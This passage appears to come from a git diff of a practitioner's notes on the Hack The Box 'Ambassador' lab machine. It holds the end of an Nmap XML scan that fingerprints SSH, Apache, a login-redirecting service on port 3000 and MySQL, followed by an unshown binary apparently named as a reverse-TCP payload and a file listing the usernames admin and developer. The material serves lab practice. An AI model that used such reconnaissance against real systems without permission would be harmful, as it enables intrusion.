<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=</elem>
<elem key="type">ssh-rsa</elem>
<elem key="bits">3072</elem>
</table>
<table>
<elem key="fingerprint">80a4c52e9ab1ecda276439a408973bef</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="bits">256</elem>
</table>
<table>
<elem key="fingerprint">f590ba7ded55cb7007f2bbc891931bf6</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="bits">256</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.41" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.41</cpe></service><script id="http-methods" output="&#xa; Supported Methods: GET POST OPTIONS HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-generator" output="Hugo 0.94.2"/><script id="http-title" output="Ambassador Development Server"><elem key="title">Ambassador Development Server</elem>
</script><script id="http-server-header" output="Apache/2.4.41 (Ubuntu)"><elem>Apache/2.4.41 (Ubuntu)</elem>
</script></port>
<port protocol="tcp" portid="3000"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ppp" servicefp="SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDA0%P=x86_64-pc-linux-gnu%r(GenericLines,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(GetRequest,174,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:22:57\x20GMT\r\nContent-Length:\x2029\r\n\r\n&lt;a\x20href=\&quot;/login\&quot;&gt;Found&lt;/a&gt;\.\n\n&quot;)%r(Help,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(HTTPOptions,12E,&quot;HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23:02\x20GMT\r\nContent-Length:\x200\r\n\r\n&quot;)%r(RTSPRequest,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(Hello,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TerminalServerCookie,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(TLSSessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;)%r(SSLv23SessionReq,67,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&quot;);" method="table" conf="3"/><script id="fingerprint-strings" output="&#xa; GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie: &#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request&#xa; GetRequest: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:22:57 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.&#xa; HTTPOptions: &#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:02 GMT&#xa; Content-Length: 0"><elem key="GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie">&#xa; HTTP/1.1 400 Bad Request&#xa; Content-Type: text/plain; charset=utf-8&#xa; Connection: close&#xa; Request</elem>
<elem key="GetRequest">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Content-Type: text/html; charset=utf-8&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:22:57 GMT&#xa; Content-Length: 29&#xa; href=&quot;/login&quot;&gt;Found&lt;/a&gt;.</elem>
<elem key="HTTPOptions">&#xa; HTTP/1.0 302 Found&#xa; Cache-Control: no-cache&#xa; Expires: -1&#xa; Location: /login&#xa; Pragma: no-cache&#xa; Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax&#xa; X-Content-Type-Options: nosniff&#xa; X-Frame-Options: deny&#xa; X-Xss-Protection: 1; mode=block&#xa; Date: Tue, 24 Jan 2023 12:23:02 GMT&#xa; Content-Length: 0</elem>
</script></port>
<port protocol="tcp" portid="3306"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="mysql" product="MySQL" version="8.0.30-0ubuntu0.20.04.2" method="probed" conf="10"><cpe>cpe:/a:mysql:mysql:8.0.30-0ubuntu0.20.04.2</cpe></service><script id="mysql-info" output="&#xa; Protocol: 10&#xa; Version: 8.0.30-0ubuntu0.20.04.2&#xa; Thread ID: 43&#xa; Capabilities flags: 65535&#xa; Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, InteractiveClient, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults&#xa; Status: Autocommit&#xa; Salt: \x01g1&#xd;&lt;8\x19#\x08@u6\x18S\x06VdJ&#xd;[&#xa; Auth Plugin Name: caching_sha2_password"><elem key="Protocol">10</elem>
<elem key="Version">8.0.30-0ubuntu0.20.04.2</elem>
<elem key="Thread ID">43</elem>
<elem key="Capabilities flags">65535</elem>
<table key="Some Capabilities">
<elem>Support41Auth</elem>
<elem>Speaks41ProtocolOld</elem>
<elem>SupportsLoadDataLocal</elem>
<elem>LongPassword</elem>
<elem>IgnoreSigpipes</elem>
<elem>SupportsTransactions</elem>
<elem>Speaks41ProtocolNew</elem>
<elem>DontAllowDatabaseTableColumn</elem>
<elem>FoundRows</elem>
<elem>SupportsCompression</elem>
<elem>InteractiveClient</elem>
<elem>SwitchToSSLAfterHandshake</elem>
<elem>IgnoreSpaceBeforeParenthesis</elem>
<elem>ConnectWithDatabase</elem>
<elem>LongColumnFlag</elem>
<elem>ODBCClient</elem>
<elem>SupportsMultipleStatments</elem>
<elem>SupportsAuthPlugins</elem>
<elem>SupportsMultipleResults</elem>
</table>
<elem key="Status">Autocommit</elem>
<elem key="Salt">\x01g1&#xd;&lt;8\x19#\x08@u6\x18S\x06VdJ&#xd;[</elem>
<elem key="Auth Plugin Name">caching_sha2_password</elem>
</script></port>
</ports>
<times srtt="46509" rttvar="1023" to="100000"/>
</host>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<taskbegin task="NSE" time="1674563263"/>
<taskend task="NSE" time="1674563263"/>
<runstats><finished time="1674563263" timestr="Tue Jan 24 07:27:43 2023" summary="Nmap done at Tue Jan 24 07:27:43 2023; 1 IP address (1 host up) scanned in 294.24 seconds" elapsed="294.24" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

BIN
HTB/ambassador/rtcp64.elf Normal file
View File

Binary file not shown.

2
HTB/ambassador/users Normal file
View File

@@ -0,0 +1,2 @@
admin
developer